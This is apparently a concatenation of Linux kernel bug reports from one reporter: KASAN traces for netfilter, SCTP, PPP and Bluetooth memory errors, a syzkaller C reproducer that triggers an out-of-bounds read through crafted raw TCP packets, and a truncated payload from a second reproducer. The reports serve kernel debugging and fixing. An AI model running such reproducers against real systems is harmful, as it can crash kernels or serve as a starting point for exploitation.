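__do_page_fault+0x199/0x8e0 /kernel/arch/x86/mm/fault.c:1187 [] SyS_sendto+0x40/0x50 /kernel/net/socket.c:1619 [] entry_SYSCALL_64_fastpath+0x23/0xc1 /kernel/arch/x86/entry/entry_64.S:207 Memory state around the buggy address: 8800a45df280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8800a45df300: f1 f1 f1 f1 00 00 04 f4 f2 f2 f2 f2 00 00 04 f4 8800a45df380: f2 f2 f2 f2 00 00 00 00 00 f4 f4 f4 f3 f3 f3 f3 ^ 8800a45df400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8800a45df480: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 01 f4 f4 f4 ==
/*
 * Reproducer for the KASAN stack-out-of-bounds report above. The trace shows
 * the bad read in tcp_sack() (inlined into tcp_in_window() / tcp_packet()),
 * reached from raw_sendmsg() through ip_push_pending_frames() and the
 * conntrack LOCAL_OUT hook.
 *
 * This is syzkaller output, lightly tidied: every buffer and address struct
 * lives in one fixed anonymous mapping and the byte values are whatever the
 * fuzzer found, not a hand-built packet. It needs CAP_NET_RAW for the raw
 * socket, a kernel with nf_conntrack hooked on outgoing IPv4 traffic, and
 * KASAN to actually report the read.
 *
 * Returns 0 once both sendto() calls were attempted, 1 if setup failed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)
{
	/*
	 * Fixed, zero-filled scratch area. The posted listing reads 0x2000ul
	 * here, but every pointer used below (0x20002fe4, 0x2000b000,
	 * 0x2001504f..0x20015137) lies in 0x20000000..0x20019000 and none in
	 * 0x2000..0x1b000, so the base was presumably 0x20000000 (syzkaller's
	 * usual one) and lost digits in transit; with 0x2000 the first store
	 * would fault before any packet is built.
	 */
	void *area = mmap((void *)0x20000000ul, 0x19000ul, PROT_READ | PROT_WRITE,
			  MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
	if (area == MAP_FAILED) {
		perror("mmap");
		return 1;
	}

	/*
	 * On a raw IPPROTO_TCP socket user space supplies the whole TCP
	 * header, including the option bytes that conntrack's TCP tracker
	 * (tcp_sack() in the trace) parses.
	 */
	int sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sock < 0) {
		perror("socket(AF_INET, SOCK_RAW, IPPROTO_TCP)");
		return 1;
	}
	/* The generated repro sends on the duplicate; kept as-is. */
	int sock_dup = dup(sock);
	if (sock_dup < 0) {
		perror("dup");
		return 1;
	}

	/*
	 * First send: 15 bytes, less than a TCP header. Flags 0x8800 are
	 * MSG_MORE | MSG_CONFIRM on Linux, so the bytes should be held as a
	 * pending frame rather than transmitted. The three stores land in
	 * sin_zero of the sockaddr_in at 0x20002fe4 (offsets 8, 10, 12); its
	 * family, port and address stay zero from the fresh mapping -- an
	 * artifact of the generated repro, not a meaningful destination.
	 */
	memcpy((void *)0x2000b000, "\x11\xaf\x7d\x99\x91\x3c\x87\x34\x85\x18\xc4\xd6\xf2\x30\x0a", 15);
	*(uint16_t *)0x20002fec = (uint16_t)0x2;
	*(uint16_t *)0x20002fee = (uint16_t)0x11ab;
	*(uint32_t *)0x20002ff0 = (uint32_t)0x17f;
	if (sendto(sock_dup, (void *)0x2000b000ul, 0xful, 0x8800ul,
		   (struct sockaddr *)0x20002fe4ul, 0x1cul) < 0)
		perror("sendto #1");

	/*
	 * Second send: 232 more bytes with flags 0x880 = MSG_CONFIRM | MSG_EOR
	 * (no MSG_MORE), so the pending frame is completed and pushed out,
	 * which is where the trace enters ip_push_pending_frames() and
	 * conntrack. The stores at 0x2001501c..0x20015037 sit past the 0x1c
	 * address bytes actually passed from 0x20015000, so that sockaddr is
	 * all zero as well.
	 */
	memcpy((void *)0x2001504f, "\x7e\xb1\x52\x5b\x78\x85\x27\xe7\xcc\x3d\xf5\x18\x1b\xba\xda\x97\x6c\x18\x72\x0c\xd2\x0a\xa6\x77\xb7\x8b\xa2\xd2\x1d\xf0\x6b\xf6\x1a\x27\x6b\x98\x3e\x0b\x49\x8d\x54\x6e\x9e\xbb\x21\x4a\x72\x79\x1f\x82\xaf\x89\x2c\xf6\xd3\xc9\xd7\xed\x18\x29\x4d\x2e\x03\x15\xe2\x03\x14\xd0\xac\xa5\x81\x37\x73\x88\xa9\xf5\x08\xe5\xef\x5b\x56\xb7\x18\x8f\xe6\x19\xea\x91\x82\x23\xdd\x2c\x5c\xa5\xf0\xfc\xd8\xe2\x8b\x91\x48\x70\x24\xed\xae\xf9\x06\xac\xc4\x53\x01\xc3\xf5\xa3\x10\xef\xf1\xa6\x2b\xae\x72\xc7\x1a\x02\xee\x78\xcd\xd1\x7e\x8c\x9c\x1a\x36\xc7\xd4\x7c\x82\x64\xf7\x8b\x5a\xb0\x72\xa8\x87\x3c\xdc\xd0\xba\xfe\x70\x7d\x8c\x23\x78\xad\x7c\x31\x04\xec\xab\x1e\x4c\xee\xae\x84\xd8\x1a\x1d\x85\xa5\x57\xa8\x24\x53\x08\x1c\x4f\xda\x49\xe5\x3a\x99\x8c\x29\xa1\xed\x4b\x42\x7a\x15\x48\x2a\x22\x3b\x81\xfe\x47\x74\xc1\x2f\x64\xcf\x10\xd4\x71\x72\x50\x71\xd7\xf6\xb0\xca\x41\x9a\x5e\x3e\xe4\x31\x19\xd1\x19\x46\x20\x66\x4c\x2f\xea\x76\x17\x2d\x94", 232);
	*(uint16_t *)0x2001501c = (uint16_t)0xa;
	*(uint16_t *)0x2001501e = (uint16_t)0x11ab;
	*(uint32_t *)0x20015020 = (uint32_t)0xbdc;
	*(uint32_t *)0x20015024 = (uint32_t)0x0;
	*(uint32_t *)0x20015028 = (uint32_t)0x0;
	*(uint32_t *)0x2001502c = (uint32_t)0x0;
	*(uint32_t *)0x20015030 = (uint32_t)0x100;
	*(uint32_t *)0x20015034 = (uint32_t)0x3;
	if (sendto(sock_dup, (void *)0x2001504ful, 0xe8ul, 0x880ul,
		   (struct sockaddr *)0x20015000ul, 0x1cul) < 0)
		perror("sendto #2");
	return 0;
}
Best Regards, Baozeng Ding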
net/sctp: stack-out-of-bounds in sctp_getsockopt
d4\x3a\x64\x51\x68\x13\x2d\x25\xba\x6d\x3f\x74\x68\x84\x89\x04\xd1\xa6\xe2\x7d\xaf\xfa\xd9\xce\x52\xbe\x6f\xb6\xe3\xff\x92\x35\xa1\x88\x4a\x68\x27\xaa\x25\xf8\xc1\xd5\x3b\xe5\x69\x11\x4f\x75\x4c\xe9\xff\x8b\x86\x53\x20\xb7\x10\xa2\x62\xcc\xc3\x06\x85\xde\x3e\x1c\x5a\x62\x3a\x2d\x0d\x0b\x0c\xb2\xac\x75\x42\x4d\x82\x3f\x7b\xf7\x28\xea\x2d\xff\x42\xa8\xdf\xb3\x49\x1a\xfd\xae\x2c\xd4\x35\x8e\x96\xb3\xe1\x0a\x92\x56\xb7\xde\xe8\x9e\xc3\x9e\x88\x79\xc4\x71\x46\x27\xf4\x9e\x85\xf4\x8f\x1f\x9a\xe5\x7e\x02\x09\x34\x80\x1e\x87\xa8\x9a\xce\xac\xfb\x43\x07\xdf\x15\xe8\x71\x9a\xa3\x80\x18\x1b\x15\xbd\x57\xb6\xc1\x73\x6e\xb1\x28\x3a\x01\xd5\x8e\x15\x85\xbd\x52\xdf\xfa\x64\xaa\x13\x0e\x2f\x64\x05\x11\xce\x79\x8b\xa8\x02\x29\x7f\x72\x0f\x37\x89\xb4\x54\x0b\x09\x02\x75\xc2\x8e\xd7\xcd\x7e\xfb\x4f\x72\xf1\x47\xea\xa2\x2a\xc3\xc4\xe9\x70\xfe\xa5\x80\x88\x21\x33\xcf\x13\x66\x98\x23\x10\x5c\xa4\xbd\xee\xc0\xb4\xdd\xfb\xff\xf2\x38\xab\xca\x36\x62\x35\x84\xe4\x73\x5c\xc7\x3e\x72\x2e\x17\x43\x6f\x85\x45\x4f\x82\x62\x0d\x77\xae\xcb\xe1\x8f\xe8\xf0\x84\x3e\x62\x8b\x70\x2b\x55\xb5\xa7\x13\xcf\xa1\x78\x77\x82\xe2\xb7\x1c\x65\x7f\xb5\x79\x73\x01\x07\xd1\x9f\x45\x6a\xbb\x3d\xbf\xc8\x71\x5b\x9f\x30\xc7\xb9\xb8\x53\x9f\xe1\xba\xb6\x78\x9e\x05\x75\xa3\x55\xb1\x26\x96\xa9\xb2\x82\xce\x81\x5c\x8a\x18\xb3\x4b\x0c\x18\x8c\xf2\x7c\x09\xde\xcb\xcf\x78\x22\x58\xf6\x15\xf6\xf7\x48\xda\x08\x75\xd4\xc1\x20\xc3\x18\x2e\x89\xe8\x5b\x48\xd9\xbc\x1f\xbb\xed\x31\xaf\x12\x4d\xcd\x46\x60\xa0\xef\x0e\x2e\x21\x1d\x2b\x68\x75\xb9\x42\x5e\xd7\xae\x35\x46\xe9\x06\x63\x1d\x3c\xd6\x9c\x14\x3b\x09\x29\x49\x70\xb9\xe1\xe0\x09\x45\x41\x62\x0c\xff\x5a\x77\xbe\x31\xa6\x03\x94\x92\xde\x41\x99\xfa\x68\x99\x74\xbb\x0a\x3d\xac\x9c\x7e\x00\x6b\xcd\xc1\x83\xa7\xc5\x63\xdd\x10\xea\x59\x27\xdc\x02\x98\xd6\x43\x20\x24\x4e\xc0\xdc\xa2\x98\xdf\x3e\xaf\x61\x35\xa0\x95\x3f\x9a\xaa\x7d\xe9\xe9\x0d\xe5\x97\x66\x1a\x9f\xbf\x56\xc8\x37\x84\x18\x2b\xd2\xcd\xd6\xb3\x19\xd8\x4a\x30\x6e\xcb\x99\x1c\xe9\x0f\xdb\xca\x30\xe1\xe2\x90\xba\xb9\x61\x00\x
bf\xeb\xad\x6a\xc8\x52\xea\x1a\x92\x05\x0c\x3b\x78\x82\x01\xac\xfd\x88\x6c\xca\xe2\xfb\xe7\x0f\xcc\x75\x9c\x98\x12\x26\xcf\xa6\x80\x02\x35\xdf\x6e\xe1\x11\x1d\xa7\x30\x17\x38\x41\xd9\x81\x55\x1a\x1e\xd1\xfe\x60\xbf\xef\x09\x25\xc0\xdb\x9f\xc4\xc6\x54\x1a\x85\x36\x85\x05\xb3\x9f\x2c\xc5\xcd\x12\x51\xef\xbe\x10\x79\xbf\x11\x00\x47\x0d\x9c\x14\x43\x1a\x46\xea\xd1\x34\x2e\x10\x6b\xa4\x3c\x25\x21\xe3\xb9\x15\x78\x6c\x40\x87\x90\xf7\x93\x5a\x66\x5f\x0a\x76\xff\xc2\xe2\x14\x35\x88\x47\xa1\x33\x5b\x8f\x3d\xc5\x89\xb7\xf9\x8a\x40\xf0\x1e\xc9\x30\xcd\xd8\x96\x41\x78\x58\x97\x49\xc8\x50\x61\x36\x8f\x7e\x44\x41\xc0\x84\xbb\x35\xf0\x63\xa9\xc2\x2a\xbd\xcc\x4b\xab\x8b\x16\x33\xc0\x66\xbf\x47\x62\x9b\xc4\x47\x2d\x68\x83\xca\xe3\x52\x79\xd7\xe0\x61\x80\x15\xf1\x90\x83\xa2\xbb\x4c\xe5\x8b\x50\xc8\x1b\x68\x7b\xee\x57\xdc\x54\xfa\x90\xf1\xf5\xec\x7d\x93\xe0\x80\x74\x06\xbe\xac\xc8\x85\x4d\xe8\xbf\xd3\xdd\x34\x55\xc4\xbf\x2f\x24\x19\xad\x86\x1e\x69\x2b\x6c\x3f\x00\xe8\x4b\xbb\x99\xcf\x17\x99\x00\x9d\x6c\x70\x57\xcc\x35\xee\x07\x87\x25\x8c\x0c\x8b\x9b\x38\x15\xcc\x05\x6f\xf8\x16\x78\x0b\x41\xfa\x23\x96\xc0\x79\xf8\xb7\xf0\x2b\x60\x7e\x98\xe3\x7b\xab\x80\x1f\x0d\xbf\xf6\x7e\x37\x06\xf1\x11\x42\x38\x2a\x70\xdf\xa4\xca\xf5\xf3\xf4\x7d\xca\x10\x0c\xd5\xe2\x90\xa0\x15\xde\xc2\x61\xa2\x88\xea\x32\x37\x97\x83\xd0\x4c\xad\xe2\xae\x9b\x53\xa2\xc2\x54\x0c\xbd\xe1\x50\x3b\x15\xd4\xb1\xa9\x41\x6e\x18\x2e\x30\x3f\x91\x03\x81\x86\x8c\x5c\x1f\x76\x51\x92\xf5\xb5\xb2\xc3\x16\x01\xef\xe3\x9e\xb1\x92\x0e\x0e\xcb\x20\x7f\x10\x29\x08\x6e\x15\x3d\x1e\x7c\x70\xf5\xb5\x3c\x56\x15\x3c\x59\xe6\xe7\x9e\x16\xcd\xfc\x8e\xfa\x12\x99\xbb\x07\xaa\xd7\x1c\xd0\xae\x93\x4c\xba\x16\x5d\x0c\xed\x1d\x02\x87\xcd\x38\x31\xc6\x10\x42\xe1\x46\x4e\xa3\xae\xb6\xda\xb6\xb0\x49\x55\x89\x57\xe6\xac\xe3\xbf\xb5\x5c\x59\x93\x0d\x21\x35\xdd\x57\x8c\x04\x15\x91\x05\x69\x4a\xdb\x5e\xcb\x4d\xa3\x5d\xa8\x7e\x95\x9e\x9d\x95\x61\xc9\x1c\xdd\x66\x0a\x76\x18\xbb\x59\x6a\xa5\xc0\xf2\xb8\x2f\xa9\x4c\xa8\xb3\x2b\xa3\x8a\xbf\x5c\xe8\x18\x3d\x7f\x
0e\x2f\xe9\x06\xf9\xb6\xcc\x60\xcc\x38\x6c\x9a\x78\xa7\x7c\x61", 1037); getsockopt(sock_dup, IPPROTO_IP, 0x81, (void *)0x2bf3ul, (socklen_t *)0x20003000ul); return 0; } Best Regards, Baozeng Ding
net/ppp: use-after-free in ppp_unregister_channel
kernel/kernel/task_work.c:115 [< inline >] exit_task_work kernel/include/linux/task_work.h:21 [] do_exit+0x8b5/0x2c60 kernel/kernel/exit.c:750 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? mm_update_next_owner+0x6f0/0x6f0 kernel/kernel/exit.c:357 [] ? __dequeue_signal+0x136/0x470 kernel/kernel/signal.c:550 [] ? recalc_sigpending_tsk+0x13b/0x180 kernel/kernel/signal.c:145 [] do_group_exit+0x108/0x330 kernel/kernel/exit.c:880 [] get_signal+0x5e4/0x14f0 kernel/kernel/signal.c:2307 [< inline >] ? kretprobe_table_lock kernel/kernel/kprobes.c:1113 [] ? kprobe_flush_task+0xb5/0x450 kernel/kernel/kprobes.c:1158 [] do_signal+0x83/0x1c90 kernel/arch/x86/kernel/signal.c:712 [] ? recycle_rp_inst+0x310/0x310 kernel/include/linux/list.h:655 [] ? setup_sigcontext+0x780/0x780 kernel/arch/x86/kernel/signal.c:165 [] ? finish_task_switch+0x424/0x5f0 kernel/kernel/sched/core.c:2692 [< inline >] ? finish_lock_switch kernel/kernel/sched/sched.h:1099 [] ? finish_task_switch+0x120/0x5f0 kernel/kernel/sched/core.c:2678 [< inline >] ? context_switch kernel/kernel/sched/core.c:2807 [] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283 [] exit_to_usermode_loop+0xf1/0x1a0 kernel/arch/x86/entry/common.c:247 [< inline >] prepare_exit_to_usermode kernel/arch/x86/entry/common.c:282 [] syscall_return_slowpath+0x19f/0x210 kernel/arch/x86/entry/common.c:344 [] int_ret_from_sys_call+0x25/0x9f kernel/arch/x86/entry/entry_64.S:281 Memory state around the buggy address: 880064e21680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880064e21700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >880064e21780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 880064e21800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880064e21880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
net/bluetooth: use-after-free in hci_event_packet
ernel/fs/read_write.c:530 [< none >] vfs_write+0x167/0x4a0 kernel/fs/read_write.c:577 [< inline >] SYSC_write kernel/fs/read_write.c:624 [< none >] SyS_write+0x111/0x220 kernel/fs/read_write.c:616 INFO: Slab 0xea0010fbdb00 objects=20 used=19 fp=0x88043ef6e310 flags=0x2fffc004080 INFO: Object 0x88043ef6e310 @offset=8976 fp=0x (null) CPU: 1 PID: 9348 Comm: kworker/u17:11 Tainted: GB 4.4.0+ #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 Workqueue: hci4 hci_rx_work 880433b8f6b0 8292049d 88048a004b40 88043ef6e310 88043ef6c000 880433b8f6e0 816f2054 88048a004b40 ea0010fbdb00 88043ef6e310 88043ef6e318 Call Trace: [< inline >] __dump_stack kernel/lib/dump_stack.c:15 [] dump_stack+0x6f/0xa2 kernel/lib/dump_stack.c:50 [] print_trailer+0xf4/0x150 kernel/mm/slub.c:654 [] object_err+0x2f/0x40 kernel/mm/slub.c:661 [< inline >] print_address_description kernel/mm/kasan/report.c:138 [] kasan_report_error+0x215/0x530 kernel/mm/kasan/report.c:236 [< inline >] kasan_report kernel/mm/kasan/report.c:259 [] __asan_report_load1_noabort+0x3e/0x40 kernel/mm/kasan/report.c:277 [< inline >] ? hci_inquiry_result_with_rssi_evt kernel/net/bluetooth/hci_event.c:3616 [] ? hci_event_packet+0x8d45/0x9f90 kernel/net/bluetooth/hci_event.c:5323 [< inline >] hci_inquiry_result_with_rssi_evt kernel/net/bluetooth/hci_event.c:3616 [] hci_event_packet+0x8d45/0x9f90 kernel/net/bluetooth/hci_event.c:5323 [< inline >] ? spin_lock kernel/include/linux/spinlock.h:302 [] ? deactivate_slab+0x212/0x710 kernel/mm/slub.c:1949 [< inline >] ? hci_cc_read_local_amp_info kernel/net/bluetooth/hci_event.c:833 [] ? hci_cmd_complete_evt+0xcfb0/0xcfb0 kernel/net/bluetooth/hci_event.c:2905 [< inline >] ? spin_unlock kernel/include/linux/spinlock.h:347 [] ? deactivate_slab+0x408/0x710 kernel/mm/slub.c:1995 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? 
debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [< inline >] ? rcu_read_unlock kernel/include/linux/rcupdate.h:926 [] ? cpuacct_charge+0x1a7/0x380 kernel/kernel/sched/cpuacct.c:255 [< inline >] ? rcu_lock_release kernel/include/linux/rcupdate.h:495 [< inline >] ? rcu_read_unlock kernel/include/linux/rcupdate.h:930 [] ? cpuacct_charge+0x1c6/0x380 kernel/kernel/sched/cpuacct.c:255 [< inline >] ? task_cpu kernel/include/linux/sched.h:3111 [] ? cpuacct_charge+0x60/0x380 kernel/kernel/sched/cpuacct.c:240 [] ? rcu_read_unlock+0x16/0x70 kernel/include/linux/rcupdate.h:926 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/kernel/locking/lockdep.c:4123 [] ? __compute_runnable_contrib+0x54/0x70 kernel/kernel/sched/fair.c:2549 [< inline >] ? __update_load_avg kernel/kernel/sched/fair.c:2668 [] ? update_cfs_rq_load_avg+0x513/0x1160 kernel/kernel/sched/fair.c:2795 [] ? skb_dequeue+0x22/0x180 kernel/net/core/skbuff.c:2333 [] ? trace_hardirqs_on+0xd/0x10 kernel/kernel/locking/lockdep.c:2619 [] ? hci_send_to_monitor+0x296/0x3e0 kernel/net/bluetooth/hci_sock.c:305 [] hci_rx_work+0x6f2/0xc00 kernel/net/bluetooth/hci_core.c:4157 [] ? process_one_work+0x6ca/0x1440 kernel/kernel/workqueue.c:2033 [] process_one_work+0x794/0x1440 kernel/kernel/workqueue.c:2036 [] ? process_one_work+0x6ca/0x1440 kernel/kernel/workqueue.c:2033 [] ? pwq_dec_nr_in_flight+0x2e0/0x2e0 kernel/include/linux/compiler.h:218 [] worker_thread+0xdb/0xfc0 kernel/kernel/workqueue.c:2170 [< inline >] ? context_switch kernel/kernel/sched/core.c:2807 [] ? __schedule+0x919/0x1bd0 kernel/kernel/sched/core.c:3283 [] kthread+0x23f/0x2d0 kernel/drivers/block/aoe/aoecmd.c:1303 [] ? process_one_work+0x1440/0x1440 kernel/include/linux/list.h:655 [] ? kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 [] ? kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 [] ret_from_fork+0x3f/0x70 kernel/arch/x86/entry/entry_64.S:468 [] ? 
kthread_create_on_node+0x3b0/0x3b0 kernel/kernel/kthread.c:285 Memory state around the buggy address: 88043ef6e200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88043ef6e280: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88043ef6e300: fc fc fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 88043ef6e380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88043ef6e400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb Best Regards, Baozeng Ding